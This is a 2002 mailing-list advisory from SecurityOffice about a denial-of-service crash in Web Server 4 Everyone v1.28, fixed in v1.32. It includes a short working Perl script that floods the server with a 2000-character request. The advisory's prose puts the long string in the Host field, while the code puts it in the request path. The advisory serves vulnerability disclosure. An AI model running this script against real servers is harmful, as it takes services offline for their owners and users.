[SecurityOffice] Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability

From: Tamer Sahin (tsat_private)
Date: Wed Oct 23 2002 - 02:10:40 PDT

Next message: Thor Larholm: "RE: Vulnerable cached objects in IE (9 advisories in 1)"

Previous message: OpenPKG: "[OpenPKG-SA-2002.010] OpenPKG Security Advisory (apache)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: MD5

- --[ Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability ]--

- --[ Type

Denial of Service

- --[ Release Date

October 23, 2002

- --[ Product / Vendor

Web Server 4 Everyone is an Internet and Intranet server that supports HTTP Services. Web Server
4 Everyone is available for Microsoft

Windows operating systems.

http://www.freeware.lt/Info/projects.php

- --[ Summary

The problem is Web Server 4 Everyone v1.28 with bounds checking, when you request 2000 characters
"web4all.exe" just shuts down.

This vulnerability also affects Web Server 4 Everyone versions prior to v1.28 for Microsoft Windows
2000.

When the attacker send a request in size of 2000 characters in "Host:" field that contains all
"127.0.0.1", the server crashes. In case you

send a request that size without adding the "Host:" there is no effect on running program. The Web
server must be restarted to regain

normal functionality.

- --[ Exploit

An exploit for this vulnerability exists and is available below.

=============== SNIP ===============

#!/usr/bin/perl -w

use IO::Socket;

$host = $ARGV[0];
$port = $ARGV[1];
$evil = "A" x 2000;

print "Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability by SecurityOffice\n";
print "Usage: $0 host port\n";
print "Connecting...\n";
$socket = IO::Socket::INET->
            new(Proto=>"tcp",
            PeerAddr=>$host,
            PeerPort=>$port)
            || die "Connection failed.\n";

print "Attacking...\n";
print $socket "GET /$evil HTTP/1.1\n Host: 127.0.0.1\n\n";

close($socket);
print "\nConnection closed. Finished.\n\n";

=============== SNIP ===============

- --[ Tested

Windows 2000 Sp3 / Web Server 4 Everyone v1.28
Windows 98 SE / Web Server 4 Everyone v1.28

- --[ Vulnerable

Web Server 4 Everyone v1.28

- --[ Vendor Status

This vulnerability fixed Web Server 4 Everyone v1.32

- --[ Disclaimer

http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the
information and/or the software listed on this

security advisory.

- --[ Author

Tamer Sahin
tsat_private
http://www.securityoffice.net

All our advisories can be viewed at http://www.securityoffice.net/articles/

Please send suggestions, updates, and comments to feedbackat_private

(c) 2002 SecurityOffice

This Security Advisory may be reproduced and distributed, provided that this Security Advisory is
not modified in any way and is

attributed to SecurityOffice and provided that such reproduction and distribution is performed
for non-commercial purposes.

Tamer Sahin
http://www.securityoffice.net

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQEVAwUAPbZnkvpL5ibJRTtBAQHxWAf/dWgBrrq5E6tlSZ3kN5dL/Kwf5G5bnwIc
0hP5pc0xd1qozr5SBtAtvCpAaDAROzjcIRoOKXnEG2wPkJFb71lN4wKdxqrM1tL1
1sjuimEeWPE4AIs4GCfRN/XtOzq4fdv+Oc/W7WgLzNIGkB9+zeb/L0XAQu/uPL/r
4Jt6qg7VBKhsFfB0iHv6nSPEtkJzWFmsLJ/SKIT2bXTd0DRSSrW6w6WDygFHytVk
VC4+7EGFu1MoEYbnpPRHr0RKQO2esc8iv026H5Uet2mzpxL520wACuBnB1mKuLAa
yHsk6PQoFJypOarWEdMc6EevWamK4x/9VWuLM+i0/LM61TgNAqpT8Q==
=jEpl
-----END PGP SIGNATURE-----

Next message: Thor Larholm: "RE: Vulnerable cached objects in IE (9 advisories in 1)"
Previous message: OpenPKG: "[OpenPKG-SA-2002.010] OpenPKG Security Advisory (apache)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Oct 23 2002 - 08:37:26 PDT